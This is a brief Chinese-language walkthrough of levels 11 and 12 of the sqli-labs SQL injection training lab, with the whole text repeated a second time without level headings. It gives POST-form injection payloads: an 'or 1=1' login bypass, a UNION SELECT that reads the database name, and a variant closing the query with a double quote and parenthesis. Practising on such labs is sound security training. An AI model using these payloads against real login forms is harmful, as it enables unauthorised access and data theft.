sqli-lab
十一关
这里是通过post方式提交表单。
使用1' or 1=1 -- dd 依然能发现payload依然被解析了,那么我们便可以用之前的去替换or 1=1 。
uname=1' union select 1,database() -- dd&passwd=11&submit=Submit
第十二关
这里是对参数的处理方式变了。("$id")
uname=admin") or 1=1 -- d&passwd=&submit=Submit
使用")进行闭合。
sqli-lab
这里是通过post方式提交表单。
使用1' or 1=1 -- dd 依然能发现payload依然被解析了,那么我们便可以用之前的去替换or 1=1 。
uname=1' union select 1,database() -- dd&passwd=11&submit=Submit
这里是对参数的处理方式变了。("$id")
uname=admin") or 1=1 -- d&passwd=&submit=Submit
使用")进行闭合。